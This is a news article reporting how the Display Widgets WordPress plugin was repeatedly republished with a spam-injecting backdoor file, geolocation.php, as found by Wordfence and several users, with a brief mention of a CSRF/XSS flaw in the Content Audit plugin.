IS IT POSSIBLE?
Yes, it's possible in cyberspace. And they are not doing this with a malware or an adware. It's through the backdoor, installed by the authors of plugins affiliated to WordPress community.
Researchers at Wordfence found this and notified the WordPress community about the severity of the flaw a month ago. According to the researchers, around 200,000 WordPress websites (data claimed by the researchers from WordPress repository) are using the vulnerable feature to display content.
Also, they claimed that the authors behind the development of plugin have been using this as a backdoor to publish spam in those widgets.
Recently, on 12 September this year, founder of Wordfence, Mark Maunder, posted about the flaw in his blog post and described the ongoing conflicts between the firm and authors of the plugin.
According to the post, the vulnerable plugin was removed and re-attached four times in the past three months. Starting the debate on 21 June, Display widget was sold to the community for enhanced news bulletin. The very next day, a UK-based researcher and SEO consultant, David Law, found something unusal with that creepy plugin which had installed additional code from an external server. As soon as he found it, he mailed about the flaw to the community.
Responding to his findings, the team removed the plugin on 23 June from the repository. After seven days, the developer released an updated version 2.6.1 of the plugin containing a malicious file called geolocation.php.
HOW IS UPDATE VULNERABLE?
The file 'geolocation.php' is actually a backdoor with a red carpet opened for the plugin author to post his/her views or ideas in the new sites, which run on the plugin. More than the features of backdoor, it loots the rights of the site administrator to post and remove the content.
However, actors can now become editors of the media outlets with this widget flaw. And the most horrible thing is the anonymity maintained here by the actor. What the actor manipulates in the widget can't be seen by the site administrator or the editor in the bureau, unless s/he uses some other device to look into the website.
DOES THE PLAY GET OVER?
No, it is going on. The UK researcher has again contacted the community and explained about the privacy flaw implications. The forum removed the vulnerable plugin on 1 July and added it again with an updated version 2.6.2 on 6 July - but with the same flaw. When the researcher tried to take the flaw to their notice, the community refused to listen to him.
After a few weeks, on 23 July, Calvin Ngan, another user, contacted the team to notify the spam content injection flaw in the updated plugin. Immediately, the community once again removed it and added on 2nd September with malicious code in line 117.
Again, another forum member reported the injection flaw in widget on 7 September. The very next day, the plugin author responded with the comment. 'Thank you for letting me know. Yes, the last update fixed this you need to clear your cache and update to the latest version. As I mentioned in the changelog, I asked a friend of mine to review the code and he gave me a full report. You can look at the wp_options table for leftovers, and if you don’t find anything then you should be okay,' the comment reads.
Another researcher, Tom Adams of Packet Storm community, found another flaw in content audit plugin. It common flaw makes a hacker play the role of editor at a news desk. The researcher found this flaw a month back and reported it to the community. The flaw, named 'Content Audit 1.9.1' alias CSRF/XSS of WordPress community, could allow the unauthenticated attacker to do everything like a site admin. As soon as it was reported, it was removed.
WILL THE PLAY CONTINUE?
As per media reports, a few other flaws in widgets were found. But they are fixed in latest updates by the community team.